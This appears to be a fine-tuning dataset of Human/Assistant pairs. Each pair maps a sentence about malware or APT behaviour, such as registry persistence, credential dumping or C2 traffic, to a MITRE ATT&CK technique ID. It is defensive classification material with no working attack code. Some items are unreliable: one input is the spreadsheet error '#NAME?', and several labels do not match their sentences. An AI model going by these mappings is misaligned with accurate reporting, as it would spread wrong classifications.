techniques and ID from MITRE ATT&CK framework.,An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has communicated with its C2 via HTTP POST requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Peppy can take screenshots on targeted systems.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail can receive data and executable scripts from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT used Nmap for remote system discovery.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete can find, encrypt, and upload files from fixed and removable drives.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can enumerate the IP and domain of a target system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent.btz drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has extracted tar.gz files after downloading them from a C2 server.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT can capture the victim’s screen remotely.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has also attempted to hide executables by changing the file extension to "".scr"" to mimic Windows screensavers.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into processes via ptrace system calls in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has used masscan to look for kubelets in the internal Kubernetes network.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is a guest post by independent security researcher James Quinn. This will be Part 1 of a series titled Reversing Gh0stRAT Variants.  As 2018 drew to a close and 2019 took over, I began to see a different behavior from SMB malware authors.  Instead of massive, multi-staged cryptocurrency miners, I began to see more small, covert RATs serving as partial stage1’s.  Of these samples, there was one specific sample that stood out to me.  A Gh0stRAT variant, this sample not only changed the Gh0stRAT header from “Gh0st” to “nbLGX”, it also hid its traffic with an encryption algorithm over the entire TCP segment, in addition to the standard Zlib compression on the Gh0stRAT data.  Some key functionality is below: Can download more malware Offline Keylogger Cleans Event logs### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoleNet can use PowerShell to set persistence.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSOURCE achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to clean up and remove data structures from a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.### Assistant: T1609: Container Administration Command" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used a custom protocol for command and control.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When we analyzed the email headers, we determined that the email was sent from an SMTP server using an IP associated with the Yonsei University network### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can exfiltrate collected information from the host to the C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest searches through the /Users/ folder looking for executable files.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may perform Network Denial of Service attacks to degrade or block the availability of targeted resources to users.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The information contained in this data dump include: Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Scripts to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems The Leak In mid-March 2019, an unknown entity appeared on several hacking forums and Twitter with the user handle @Mr_L4nnist3r claiming they had access to data dumps involving internal tools and data used by the OilRig group### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Neither this new domain nor the IP it resolves to have been observed in the past, indicating that the sample in Table 3 may be associated with a newer campaign### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During privilege escalation, freely available tools such as Mimikatz and Ncrack have been observed, in addition to legitimate tools such as Windows Credential Editor and ProcDump### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,#NAME?### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has used modules that automatically upload gathered documents to the C2 server.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APC injection is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) Passwords, like ""admin-na-google123!@#"" shown in Figure 4, are required to interact with the web shell### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc collects the network adapter information and domain/username information based on current remote sessions.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro has the ability to delete a specified file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used Rundll32.exe to execute payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ProLock can remove files containing its payload after they are executed.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While we have not been able to obtain a secondary payload from the Unicorn generated PowerShell script, we believe that this group uses the script to deliver Metasploit’s Meterpreter as a potential payload as well### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer deobfuscates its strings and APIs once its executed.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used JavaScript to drop and execute malware loaders.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pass the ticket is a method of authenticating to a system using Kerberos tickets without having access to an account's password.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's business relationships that can be used during targeting.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has used multiple native Windows APIs to execute and conduct process injections.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PDB strings containing the 'SyberSpace' username### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel uses HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke has used image files to hide its loader component.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Carbanak malware communicates to its command server using HTTP with an encrypted payload.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has also decoded base64-encoded source code of a downloader.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework., net accounts ### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the elapsed time, XCSSET executes additional modules.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has also interacted with compromised systems to browse and copy files through RDP sessions.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has run net user, net user /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to get account listings on a victim.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Get-LocAdm### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest uses various API functions such as NSCreateObjectFileImageFromMemory to load and link in-memory payloads.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MirageFox can collect CPU and architecture information from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Like other Execution Guardrails, environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has harvested data from remote mailboxes including through execution of \\\c$\Users\\AppData\Local\Microsoft\Outlook*.ost.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse CMSTP to proxy execution of malicious code.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum has built-in commands for uploading, downloading, and executing files to the system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain trusts can be enumerated using the `DSEnumerateDomainTrusts` Win32 API call, .NET methods, and LDAP.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can use net view to discover remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has enabled the TESTSIGNING boot configuration option to facilitate loading of a driver component.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 executes shellcode and a VBA script to decode Base64 strings.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key has used RSA encrypted communications with C2.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer’s data wiper module writes zeros into the registry keys in SYSTEM\CurrentControlSet\Services to render a system inoperable.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info .### Assistant: T1594: Search Victim-Owned Websites" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the backdoor establishes a connection to the command and control server, it sets the request period time equal to the specified dwell time for the standby mode### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim’s machine.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sudo creates a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has deleted Registry keys during post compromise cleanup activities.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Daserf samples were signed with a stolen digital certificate.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky can shutdown the infected machine.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 created user accounts and adds them to the User and Admin groups.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The built-in history only tracks the commands used in the current session.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop has used a simple XOR operation to decrypt strings.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor has the ability to use native APIs for execution including GetProcessHeap, GetProcAddress, and LoadLibrary.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In cloud environments, storage objects within compromised accounts may also be encrypted.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used scheduler and schtasks to create new tasks on remote hosts as part of lateral movement.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI has established persistence by writing the payload to the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis replaces the nonexistent Windows DLL ""msfte.dll"" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky can detect connected USB devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Windows safe mode to disable endpoint defenses.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit is a Rootkit that has been used by Axiom.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can capture a screenshot of the current screen.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.### Assistant: T1537: Transfer Data to Cloud Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has used cmd.exe to create a Registry entry to establish persistence.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For C2 over HTTP, Helminth encodes data with base64 and sends it via the ""Cookie"" field of HTTP requests.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has used regsvr32.exe to execute malicious DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used ""ipconfig"" to identify the network configuration of a victim machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has a plugin that collects information about inserted storage devices, modems, and phone devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx has the ability to enumerate drive types.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One persistence mechanism used by CozyCar is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To decode this information, BADNEWS takes the following steps: Base64-decode the string Perform the decoding cipher used in previous versions Base64-decode the result Decrypt the result using the Blowfish algorithm and a static key A script, which is included in the Appendix, will decrypt data from these dead drop resolvers### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke takes periodic screenshots and exfiltrates them.### Assistant: T1113: Screen Capture"